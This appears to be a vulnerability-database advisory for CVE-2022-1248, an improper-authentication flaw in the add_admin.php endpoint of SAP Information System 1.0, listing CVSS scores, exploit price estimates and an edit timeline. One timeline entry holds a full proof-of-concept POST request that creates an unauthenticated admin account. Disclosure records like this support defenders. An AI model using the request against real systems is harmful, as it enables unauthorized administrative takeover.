SAP Information System 1.0 POST Request add_admin.php improper authentication

A vulnerability was found in SAP Information System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /SAP_Information_System/controllers/add_admin.php of the component POST Request Handler. The manipulation leads to improper authentication. The problem is classified as CWE-287. The weakness was published 04/06/2022. This vulnerability is tracked as CVE-2022-1248. The attack may be launched remotely. Technical details are available, and an exploit is available. The structure of the vulnerability defines a possible price range of USD $0-$5k at the moment. The exploit is declared as proof-of-concept and is available at vuldb.com. As a 0-day, the estimated underground price was around $0-$5k. A possible mitigation was published before, not after, the disclosure of the vulnerability.

Timeline

The analysis of the timeline helps to identify the required approach and handling of individual vulnerabilities and vulnerability collections. This overview makes it possible to see less important slices and more severe hotspots at a glance. Initiating immediate vulnerability response and prioritization of issues is possible.

ID | Committed | User | Field | Change | Remarks | Accepted | Status | Conf (%)
12357019 | 04/09/2022 | mrempy | sourcecode | | | 04/10/2022 | we declare full http recordings as PoC exploit | 0
12357018 | 04/09/2022 | mrempy | publicity | 0 | | 04/10/2022 | we declare full http recordings as PoC exploit | 0
12350946 | 04/08/2022 | VulD... | cve_nvd_summary | A vulnerability was found in SAP Information System 1.0 which has been rated as critical. Affected by this issue is the file /SAP_Information_System/controllers/add_admin.php. An unauthenticated attacker is able to create a new admin account for the web application with a simple POST request. Exploit details were disclosed. | cvedetails.com | 04/08/2022 | accepted | 70
12350945 | 04/08/2022 | VulD... | cvss3_cna_basescore | 7.3 | see CVSS documentation | 04/08/2022 | accepted | 90
12350944 | 04/08/2022 | VulD... | cvss3_meta_tempscore | 6.9 | see CVSS documentation | 04/08/2022 | accepted | 90
12350943 | 04/08/2022 | VulD... | cve_cna | VulDB | nvd.nist.gov | 04/08/2022 | accepted | 70
12350942 | 04/08/2022 | VulD... | cvss3_cna_a | L | nvd.nist.gov | 04/08/2022 | accepted | 70
12350941 | 04/08/2022 | VulD... | cvss3_cna_i | L | nvd.nist.gov | 04/08/2022 | accepted | 70
12350940 | 04/08/2022 | VulD... | cvss3_cna_c | L | nvd.nist.gov | 04/08/2022 | accepted | 70
12350939 | 04/08/2022 | VulD... | cvss3_cna_s | U | nvd.nist.gov | 04/08/2022 | accepted | 70
12350938 | 04/08/2022 | VulD... | cvss3_cna_ui | N | nvd.nist.gov | 04/08/2022 | accepted | 70
12350937 | 04/08/2022 | VulD... | cvss3_cna_pr | N | nvd.nist.gov | 04/08/2022 | accepted | 70
12350936 | 04/08/2022 | VulD... | cvss3_cna_ac | L | nvd.nist.gov | 04/08/2022 | accepted | 70
12350935 | 04/08/2022 | VulD... | cvss3_cna_av | N | nvd.nist.gov | 04/08/2022 | accepted | 70
12347326 | 04/06/2022 | VulD... | sourcecode | POST /SAP_Information_System/controllers/add_admin.php HTTP/1.1 Host: target.com Content-Length: 345 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYELEK8fMdX63l0iI Origin: http://target.com Referer: http://target.com/SAP_Information_System/Dashboard/pages/Admin.php Accept-Encoding: gzip, deflate Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=jjnkf4nmpdm7sca82btt2r4s1c Connection: close ------WebKitFormBoundaryYELEK8fMdX63l0iI Content-Disposition: form-data; name="username" hacker ------WebKitFormBoundaryYELEK8fMdX63l0iI Content-Disposition: form-data; name="password" P@ssw0rd! ------WebKitFormBoundaryYELEK8fMdX63l0iI Content-Disposition: form-data; name="user" admin ------WebKitFormBoundaryYELEK8fMdX63l0iI-- | | 04/06/2022 | accepted | 100
12346910 | 04/06/2022 | VulD... | price_0day | $0-$5k | see exploit price documentation | 04/06/2022 | accepted | 90
12346909 | 04/06/2022 | VulD... | cvss3_meta_tempscore | 6.6 | see CVSS documentation | 04/06/2022 | accepted | 90
12346908 | 04/06/2022 | VulD... | cvss3_meta_basescore | 7.3 | see CVSS documentation | 04/06/2022 | accepted | 90
12346907 | 04/06/2022 | VulD... | cvss3_vuldb_tempscore | 6.6 | see CVSS documentation | 04/06/2022 | accepted | 90
12346906 | 04/06/2022 | VulD... | cvss3_vuldb_basescore | 7.3 | see CVSS documentation | 04/06/2022 | accepted | 90

32 more entries are not shown